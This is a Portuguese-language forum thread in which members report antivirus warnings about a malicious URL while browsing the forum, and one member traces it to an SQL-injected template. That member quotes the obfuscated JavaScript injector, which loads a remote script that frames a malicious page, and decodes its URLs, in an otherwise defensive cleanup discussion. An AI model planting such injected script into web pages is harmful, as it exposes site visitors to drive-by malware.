Announcement

Collapse
No announcement yet.

Aviso antivirus!

Collapse
X

• Filtrar
  • Time
  • Mostrar
Clear All
new posts

• Aviso antivirus!

Ora viva,
    aos mais entendidos na matéria, acontece faz alguns dias que sempre que estou a consultar aqui no fórum, está sistematicamente a abrir uma janela do Avast a informar que bloqueou URL

"Objeto:http://directmarketinggtrade.in/in.cgi?walter"

penso que possa ser algum ficheiro que esteja aqui no fórum infetado...

Acontece isto com mais alguém?
    Abraço

Eu acho é que o problema é da tua máquina... eu acedo ao fórum a partir de vários pc's todos eles com anti-virus de vários fabricantes e nenhum se queixa de erros ao aceder ao fórum.

Comentar

Originally posted by SEDAN View Post
      Ora viva,
      aos mais entendidos na matéria, acontece faz alguns dias que sempre que estou a consultar aqui no fórum, está sistematicamente a abrir uma janela do Avast a informar que bloqueou URL

"Objeto:http://directmarketinggtrade.in/in.cgi?walter"

penso que possa ser algum ficheiro que esteja aqui no fórum infetado...

Acontece isto com mais alguém?
      Abraço
      Ontem a mim aconteceu-me algo semelhante, mas a firewall informou que o computador estava a ser atacado e chegou para a situação.

Comentar

Aconteceu ontem a noite a minha mulher a mesma coisa, ao fazer ou login ou logout. No meu caso foi o AVG que detectou.

Comentar

Épa, então sou eu que tenho máquinas boas e nenhuma se queixa! :lol

Comentar

Originally posted by JustaPor View Post
            Neste caso não será as maquinas boas, mas sim os nossos antivírus que são bons, e bloqueiam logo uma possível ameaça de infeção, tenho ativo também o Malwarebytes Anti-Malware e já bloqueou algumas vezes também, e só está a acontecer aqui no forum, portanto acho que se deveria ter uma especial atenção a este assunto :fixe

Comentar

Comigo acontece-me o mesmo...

Comentar

Originally posted by JustaPor View Post
                No pc do trabalho também não me dá nenhum aviso. É também o AVG, só que o Business Edition.

São uns esquisitos estes pc's de hoje em dia, não deixam passar nada, que chatos.

Comentar

O meu é o Avast.
                  Já tive o Nod32, o Kaspersky e o AVG, e nenhum deles se queixava.
                  Não sei se será uma questão recente, daí os outros nada terem encontrado...

Comentar

Consegui decifrar o IP (146.185.244.54), e após uma pequena pesquisa já li que é um site turco dedicado a este fim,e que está a atacar em vários fóruns a nível mundial...
                    Aconselho a terem sempre o vosso antivírus atualizado diariamente...
                    Abraços

---------- Mensagem adicionada em 04:44 PM ---------- Mensagem anterior em 04:39 PM ----------

E já agora, podem continuar a navegar aqui no fórum que não há perigo nenhum, desde que os antivírus façam o seu serviço que é bloquear, como me tem estado a acontecer...

Comentar

Porreiro :)

Comentar

Boas.
                        Acabei de bloquear a gama completa desse IP, mas nunca me deu nenhuma mensagem!

Encontrei algo relacionado na net, mas só afecta o Internet Explorer, como uso o Mozilla nunca apareceu nada!

---------- Mensagem adicionada em 11:21 PM ---------- Mensagem anterior em 10:53 PM ----------

OK,

Acho que já dei com a bronca, a fonte do problema está em um código infectado e está localizado no interior de uma tabela referente a um template na base de dados
                        Deve-se fazer uma procura no phpMyAdmin no vBulletin_init na tabela dos templates e vão encontrar isto:

Code:

var script=document.createElement(String.fromCharCode( 115,99,114,105,112,116));script.src=String.fromCha rCode(104,116,116,112,58,47,47,105,109,97,103,101, 50,121,111,117,46,105,110,47,106,113,117,101,114,1 21,46,99,111,109,112,97,116,105,98,105,108,105,116 ,121,46,106,115);var head=document.getElementsByTagName(String.fromChar Code(104,101,97,100))[0];head.appendChild(script);
                        Este código inclui o redirecionamento. Se descodificar obten-se isto apartir do segundo fromCharCode() :

http://image2you.in/jquery.compatibility.js

Neste java ele carrega o iframe.src = 'http://directmarketingmanage.in/in.cgi?walter' no iframe. este código deve ser removido á mão para resolver o problema.

Esta ameaça e introduzida no MySQL atravéz de SQL INjection, este processo de provocar introdução nas base de dados on-line já existe há muito tempo.

haaa os meus velhos tempos de hacker!!!

---------- Mensagem adicionada em 11:29 PM ---------- Mensagem anterior em 11:21 PM ----------

Aos utilizadores afectados devem verificar o host file para ver se foram adicionados nos link's ao mesmo:
                        No Xp o conteúdo do host deve ser o seguinte:
                        # Copyright (c) 1993-1999 Microsoft Corp.
                        #
                        # This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
                        #
                        # This file contains the mappings of IP addresses to host names. Each
                        # entry should be kept on an individual line. The IP address should
                        # be placed in the first column followed by the corresponding host name.
                        # The IP address and the host name should be separated by at least one
                        # space.
                        #
                        # Additionally, comments (such as these) may be inserted on individual
                        # lines or following the machine name denoted by a '#' symbol.
                        #
                        # For example:
                        #
                        # 102.54.94.97 rhino.acme.com # source server
                        # 38.25.63.10 x.acme.com # x client host

127.0.0.1 localhost

Relativo aos outros sistemas operativos o ficheiro deve ser muito idêntico.

Comentar

Eu utilizo o google chrome, e também tenho esse problema...
                          Isso é possível fazer por quem percebe de informática na óptica do utilizador? 8O
                          É muito pedir te que faças um tutorial? :assobio

Comentar

Boas,

O meu PC pessoal também se queixa disso, e neste caso Uso o CHROME e o Avast, portanto e pelo que li não me parece que seja uma 'situação' de apenas algum utilizador.

Cumps

Comentar

Originally posted by kalu View Post
                              OK,
                              Acho que já dei com a bronca, a fonte do problema está em um código infectado e está localizado no interior de uma tabela referente a um template na base de dados
                              var script=document.createElement(String.fromCharCode( 115,99,114,105,112,116));script.src=String.fromCha rCode(104,116,116,112,58,47,47,105,109,97,103,101, 50,121,111,117,46,105,110,47,106,113,117,101,114,1 21,46,99,111,109,112,97,116,105,98,105,108,105,116 ,121,46,106,115);var head=document.getElementsByTagName(String.fromChar Code(104,101,97,100))[0];head.appendChild(script);
                              Este código inclui o redirecionamento. Se descodificar obten-se isto apartir do segundo fromCharCode() :

http://image2you.in/jquery.compatibility.js

Neste java ele carrega o iframe.src = 'http://directmarketingmanage.in/in.cgi?walter' no iframe. este código deve ser removido á mão para resolver o problema.
                              Não é o caso pois não existe nenhum jquery.compatibility a ser carregado. Mais, informo que os anti-virus é que andam malucos pois há dias também me informaram que o site da empresa estava com virus, pedi um report à pessoa, ele acedeu de novo e já não apareceu nenhum erro.

Comentar

Em processamento...
                              X